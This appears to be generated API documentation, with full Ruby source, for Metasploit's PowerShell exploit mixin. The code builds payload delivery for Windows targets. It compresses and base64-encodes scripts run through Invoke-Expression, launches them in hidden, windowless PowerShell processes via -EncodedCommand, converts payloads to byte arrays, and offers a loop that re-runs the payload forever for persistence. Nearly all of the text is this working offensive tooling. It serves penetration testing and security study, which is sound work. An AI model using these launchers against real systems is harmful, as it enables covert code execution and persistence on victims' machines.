Module: Msf::Exploit::Powershell

Defined in:
lib/msf/core/exploit/powershell.rb


Instance Method Details

#build_byte_array(input_data, var_name = Rex::Text.rand_text_alpha(rand(3)+3)) ⇒ Object

Convert a binary blob into a PowerShell `[Byte[]]` array declaration; if `input_data` names an existing file, the file's contents are converted instead of the string itself.


# File 'lib/msf/core/exploit/powershell.rb', line 159

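# Render binary data as a PowerShell byte array declaration.
#
# @param input_data [String] raw bytes, or the path of a file whose bytes
#   should be used instead
# @param var_name [String] PowerShell variable name (without the `$`);
#   defaults to a random 3-5 letter name
# @return [String] `[Byte[]] $name = 0x..,0x..` with a fresh `$name += ...`
#   line started every 10 bytes, CRLF terminated
# @raise [ArgumentError] if the resulting byte list is empty
def build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
  # Only consult the filesystem when the input could be a path at all:
  # File.file? raises ArgumentError on strings containing NUL, which raw
  # PE/shellcode blobs nearly always do.
  # NOTE(review): any string that happens to name an existing file is read
  # from disk instead of being used verbatim, so data that could collide
  # with a path must be passed as bytes, not as a file name.
  code = input_data
  if !input_data.include?("\0") && ::File.file?(input_data)
    # binread: no newline translation on Windows hosts, we want raw bytes.
    code = ::File.binread(input_data)
  end
  bytes = code.unpack('C*')
  raise ArgumentError, 'build_byte_array: input_data is empty' if bytes.empty?

  psh = "[Byte[]] $#{var_name} = 0x#{bytes[0].to_s(16)}"
  bytes.each_with_index do |b, i|
    next if i.zero?
    # Every 10th byte starts a new `+=` line to keep line length sane.
    if i % 10 == 0
      psh << "\r\n$#{var_name} += 0x#{b.to_s(16)}"
    else
      psh << ",0x#{b.to_s(16)}"
    end
  end
  psh << "\r\n"
end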

#cmd_psh_payload(pay, old_psh = datastore['PSH_OLD_METHOD'], wow64 = datastore['RUN_WOW64']) ⇒ Object

Builds the cmd.exe one-liner that launches the PowerShell payload (optionally looped via PERSIST, or under 32-bit PowerShell via RUN_WOW64).


# File 'lib/msf/core/exploit/powershell.rb', line 134

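# Build the cmd.exe command line that launches a PowerShell-wrapped payload.
#
# @param pay [String] the raw payload handed to Msf::Util::EXE
# @param old_psh [Boolean] use the PowerShell 1.0 compatible loader
#   (datastore PSH_OLD_METHOD)
# @param wow64 [Boolean] run the 32-bit PowerShell from syswow64
#   (datastore RUN_WOW64)
# @return [String] `%COMSPEC% /B /C start powershell.exe -Command ...` followed
#   by CRLF
def cmd_psh_payload(pay, old_psh=datastore['PSH_OLD_METHOD'], wow64=datastore['RUN_WOW64'])
  # Allow powershell 1.0 format
  if old_psh
    psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
  else
    psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
  end
  # PERSIST: wrap the loader in a named function and re-invoke it forever
  # with a random 5-9 second pause between runs.
  # NOTE(review): the 2-3 letter function name can collide with a built-in
  # PowerShell alias (aliases win over functions in command resolution), in
  # which case the loop silently never re-runs the payload -- confirm.
  if datastore['PERSIST']
    fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
    sleep_time = rand(5)+5
    psh_payload  = "function #{fun_name}{#{psh_payload}};"
    psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
  end
  # ps_bin is a PowerShell *expression* (note the embedded quotes): either the
  # syswow64 path built from $env:windir or the bare 'powershell.exe' literal.
  ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
  # Wrap in the hidden-window launcher (which base64/-EncodedCommand encodes
  # the inner script itself).
  psh_payload = run_hidden_psh(psh_payload,ps_bin)
  # The wrapper is passed to an outer powershell via -Command, so newlines are
  # folded to ';' and double quotes escaped (Ruby '\"' is backslash + quote)
  # so cmd.exe hands them through intact.
  "%COMSPEC% /B /C start powershell.exe -Command #{psh_payload.gsub("\n",';').gsub('"','\"')}\r\n"
end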

#compress_script(script_in, eof = nil) ⇒ Object

Return a zlib compressed powershell script


# File 'lib/msf/core/exploit/powershell.rb', line 76

# Compress a PowerShell script and wrap it in a self-inflating one-liner,
# returned in the form `powershell -EncodedCommand` expects.
#
# @param script_in [String] the script text to compress
# @param eof [String, nil] an 8-character marker echoed after the script so
#   the caller can detect the end of its output; any other length is ignored
# @return [String] base64 of the UTF-16LE encoded PowerShell expression
def compress_script(script_in, eof = nil)
  # Deflate at maximum compression, then base64 so the blob can live inside a
  # single-quoted PowerShell string literal.
  deflated = ::Zlib::Deflate.deflate(script_in, ::Zlib::BEST_COMPRESSION)
  b64_blob = Rex::Text.encode_base64(deflated)

  # Generated PowerShell: load the blob into a MemoryStream, skip the two-byte
  # zlib header (DeflateStream wants raw deflate data), inflate, read the text
  # and hand it to Invoke-Expression.
  # NOTE(review): the StreamReader decodes as ASCII, so any non-ASCII
  # characters in script_in will not survive -- assumes ASCII-only scripts.
  stages = [
    "$stream = New-Object IO.MemoryStream(,",
    "$([Convert]::FromBase64String('#{b64_blob}')));",
    "$stream.ReadByte()|Out-Null;",
    "$stream.ReadByte()|Out-Null;",
    "$(Invoke-Expression $(New-Object IO.StreamReader(",
    "$(New-Object IO.Compression.DeflateStream(",
    "$stream,",
    "[IO.Compression.CompressionMode]::Decompress)),",
    "[Text.Encoding]::ASCII)).ReadToEnd());"
  ]
  ps_expr = stages.join
  # Only an exactly 8-character marker is appended; anything else is dropped.
  ps_expr << "'#{eof}'" if eof && eof.length == 8

  # -EncodedCommand takes base64 of the UTF-16LE form of the script.
  Rex::Text.encode_base64(Rex::Text.to_unicode(ps_expr))
end

#initialize(info = {}) ⇒ Object


# File 'lib/msf/core/exploit/powershell.rb', line 7

# Register the datastore options this mixin reads: PERSIST (loop the payload),
# PSH_OLD_METHOD (PowerShell 1.0 loader) and RUN_WOW64 (32-bit PowerShell).
# All three are required booleans defaulting to false.
def initialize(info = {})
  super
  persist_opt = OptBool.new('PERSIST', [true, 'Run the payload in a loop', false])
  old_psh_opt = OptBool.new('PSH_OLD_METHOD', [true, 'Use powershell 1.0', false])
  wow64_opt = OptBool.new('RUN_WOW64',
    [true, 'Execute powershell in 32bit compatibility mode, payloads need native arch', false])
  register_options([persist_opt, old_psh_opt, wow64_opt], self.class)
end

#make_subs(script, subs) ⇒ Object

Insert substitutions into the powershell script


# File 'lib/msf/core/exploit/powershell.rb', line 24

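# Apply literal string substitutions to a PowerShell script.
#
# @param script [String] path of a script file to read, or the script text
# @param subs [Array<Array(String, String)>] pairs as produced by
#   process_subs; each pattern is matched literally
# @return [String] the substituted script (a new string; the caller's input
#   is never modified in place)
# @raise [ArgumentError] if a pair is missing its pattern or replacement
def make_subs(script, subs)
  # NOTE(review): a script body that happens to equal an existing path is
  # read from disk instead of being used verbatim.
  script = ::File.file?(script) ? ::File.read(script) : script.dup

  subs.each do |pattern, replacement|
    # A nil here would make gsub raise an opaque TypeError; say what is wrong.
    if pattern.nil? || replacement.nil?
      raise ArgumentError, "make_subs: malformed substitution #{[pattern, replacement].inspect}, expected [pattern, replacement]"
    end
    script = script.gsub(pattern, replacement)
  end
  if datastore['VERBOSE']
    print_good("Final Script: ")
    script.each_line {|l| print_status("\t#{l}")}
  end
  script
end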

#process_subs(subs) ⇒ Object

Return an array of substitutions for use in make_subs


# File 'lib/msf/core/exploit/powershell.rb', line 42

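# Parse a substitution spec into pairs for make_subs.
#
# @param subs [String, nil] entries separated by `;`, each `pattern,replacement`;
#   only the first `,` splits, so a replacement may itself contain commas
# @return [Array<Array<String>>] one `[pattern, replacement]` per entry; empty
#   for nil/empty input. Blank entries (from `;;` or a leading `;`) are dropped
#   rather than passed on as an empty pair that would break make_subs.
def process_subs(subs)
  return [] if subs.nil? || subs.empty?
  subs.split(';').reject(&:empty?).map { |entry| entry.split(',', 2) }
end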

#read_script(script) ⇒ Object

Return the PowerShell script text: `script` is either the path of a file to read or the script text itself.


# File 'lib/msf/core/exploit/powershell.rb', line 54

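# Resolve a script argument to script text.
#
# @param script [String] path of a regular file to read, or the script text
# @return [String] the file's contents when `script` names a regular file,
#   otherwise `script` itself (same object, not a copy)
def read_script(script)
  # Only consult the filesystem for strings that can be a path at all (File
  # calls raise ArgumentError on NUL) and only read regular files. File.file?
  # answers false for ENOENT/ENAMETOOLONG/ENOTDIR, which is what the old
  # exception-driven version special-cased, and it never opens a directory.
  return script if script.include?("\0") || !::File.file?(script)
  # Block form closes the handle even if the read raises part way through.
  ::File.open(script, 'r') { |fd| fd.read }
end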

#run_hidden_psh(ps_code, ps_bin = 'powershell.exe') ⇒ Object

Returns a PowerShell wrapper that starts `ps_bin` as a hidden, no-window child process running the compressed `ps_code` via -EncodedCommand.


# File 'lib/msf/core/exploit/powershell.rb', line 114

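# Wrap a script in a launcher that runs it in a hidden child PowerShell.
#
# @param ps_code [String] the script to run; compressed and -EncodedCommand
#   encoded via compress_script
# @param ps_bin [String] the PowerShell executable as a PowerShell expression
#   (e.g. `'powershell.exe'` or `$env:windir+'\syswow64\...'`); a bare name
#   is quoted for you
# @return [String] newline-separated PowerShell statements (trailing newline)
def run_hidden_psh(ps_code,ps_bin='powershell.exe')
  ps_args = " -EncodedCommand #{ compress_script(ps_code) } "
  # ps_bin is emitted verbatim as the right-hand side of an assignment, so it
  # must already be a PowerShell expression. The bare default 'powershell.exe'
  # would otherwise be parsed as a command invocation (and hang waiting on
  # stdin), so quote anything that is not already quoted or a $expression.
  file_name = ps_bin =~ /\A[$'"]/ ? ps_bin : "'#{ps_bin}'"
  lines = [
    '$si = New-Object System.Diagnostics.ProcessStartInfo',
    "$si.FileName = #{file_name}",
    "$si.Arguments = '#{ps_args}'",
    '$si.UseShellExecute = $false',
    # NOTE(review): stdout is redirected but never read and the parent does
    # not wait on $p; a chatty child may block or get a broken pipe once the
    # parent exits -- confirm this is intended before relying on its output.
    '$si.RedirectStandardOutput = $true',
    "$si.WindowStyle = 'Hidden'",
    '$si.CreateNoWindow = $True',
    '$p = [System.Diagnostics.Process]::Start($si)'
  ]
  lines.join("\n") << "\n"
end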